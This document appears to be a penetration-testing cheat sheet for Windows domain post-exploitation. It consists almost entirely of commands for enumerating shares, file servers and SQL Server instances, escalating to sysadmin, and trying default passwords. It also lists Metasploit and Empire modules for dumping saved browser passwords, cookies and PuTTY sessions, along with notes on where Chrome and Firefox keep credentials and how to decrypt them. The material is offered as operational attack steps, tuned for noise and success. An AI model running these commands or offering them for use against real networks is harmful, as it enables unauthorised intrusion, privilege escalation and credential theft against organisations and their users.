Network Shares and Fileservers Enumeration
# List shares on the local host
net share
# List network computers
net view
# List shares on a remote PC (net view expects the UNC form with a leading \\)
net view \\COMPUTER_NAME /all
# What if net commands are blocked on the network?
# List shares on the local host
wmic share get /format:list
# List shares on a remote PC (no space between /node: and the host name)
wmic /node:COMPUTER_NAME share get
# WMIC is deprecated and missing from recent Windows builds; the PowerShell/CIM equivalent is:
Get-CimInstance -ClassName Win32_Share -ComputerName COMPUTER_NAME
Computers / Servers Enumeration
# List all domain computers and filter for names containing "FILE"
# (findstr is case-sensitive without /I; net group's column output truncates long names)
net group "Domain Computers" /domain | findstr /I "FILE"
# Find network shares and fileservers using PowerView
# (Find-DomainShare connects to every domain computer it enumerates, so it is noisy;
# -CheckShareAccess keeps only shares the current user can read.
# Get-DomainFileServer is derived from user LDAP attributes such as home directories and logon scripts.)
Find-DomainShare -CheckShareAccess
Get-DomainFileServer
# Powerview modules in Empire:
situational_awareness/network/powerview/share_finder
situational_awareness/network/powerview/get_fileserver
Admin Workstation Compromise Post Exploitation
# Metasploit modules
post/windows/gather/enum_putty_saved_sessions
# Empire modules (netripper hooks network APIs inside client processes, so expect it to be noisier than sessiongopher,
# which only reads saved session data from the user's profile/registry)
collection/netripper
credentials/sessiongopher
Local file Searching
# List a target user's recently accessed files (.lnk shortcuts; reading another user's profile needs admin rights or that user's context)
dir C:\Users\TARGET\AppData\Roaming\Microsoft\Windows\Recent
# Search for files with specific extensions
dir *.docx *.xlsx *.pdf /s
# Search all .txt and .csv files for any of "root", "username", "password" or "pass"
# (space-separated terms in findstr are OR'd; /S recurses, /I ignores case)
findstr /S /I "root username password pass" *.txt *.csv
# PowerView
# Find all files accessed within the last week
# (NTFS last-access timestamps are often disabled or only partially maintained, so this filter can miss files)
Find-InterestingFile -LastAccessTime (Get-Date).AddDays(-7)
# Find files/folders whose NAME contains "private" or "confidential"
# (-Include matches names, not file contents, and needs wildcards to match substrings)
Find-InterestingFile -Include *private*,*confidential*
# Find all MS Office documents on a remote share
Find-InterestingFile -Path \\SERVER\Share -OfficeDocs
Tool - PowerUpSQL - https://github.com/NetSPI/PowerUpSQL
# Find all local SQL instances:
Get-SQLInstanceLocal -Verbose
# Find all SQL instances across a domain/network
# (Domain = LDAP SPN lookup, quiet; Broadcast/ScanUDP send traffic to the network and are noisier)
Get-SQLInstanceDomain -Verbose
Get-SQLInstanceBroadcast -Verbose
Get-SQLInstanceScanUDP -Verbose
# Enumerate basic information about local SQL instances
Get-SQLInstanceLocal | Get-SQLServerInfo
# Enumerate basic information about a remote SQL instance
Get-SQLServerInfo -Instance "COMPUTER_NAME"
# List SQL instances that can be logged into as the current domain user
Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10
# Attempt to escalate to sysadmin on an SQL instance (unnecessary if the current login is already sysadmin)
Invoke-SQLEscalatePriv -Verbose -Instance "COMPUTER_NAME"
# Check SQL instances across the domain for application logins with known default passwords
# (this performs real login attempts, which are logged and may trigger lockouts)
Get-SQLInstanceDomain -Verbose | Get-SQLServerLoginDefaultPw -Verbose
# Dump SQL Server and database information to csv or xml files.
Invoke-SQLDumpInfo -Verbose -Instance "COMPUTER_NAME"
# Run numerous audit functions against an SQL server
Invoke-SQLAudit -Verbose -Instance "COMPUTER_NAME"
Port Database
1433/tcp Microsoft SQL (default instance; named instances often listen elsewhere)
1434/udp SQL Server Browser (queried by Get-SQLInstanceScanUDP to discover named instances)
3306 MySQL
5432 PostgreSQL
27017 MongoDB
# Metasploit modules
post/windows/gather/enum_chrome
post/multi/gather/firefox_creds
post/firefox/gather/cookies
post/firefox/gather/passwords
post/windows/gather/forensics/browser_history
# Empire modules
collection/ChromeDump
collection/FoxDump
# Firefox profile location (logins.json + key4.db hold saved credentials; a master password blocks offline decryption)
C:\Users\TARGET\AppData\Roaming\Mozilla\Firefox\Profiles
# Google Chrome profile location ("Login Data" is encrypted with a DPAPI-protected key stored in "Local State",
# so decrypt in the target user's context or with their DPAPI master key)
C:\Users\TARGET\AppData\Local\Google\Chrome\User Data\Default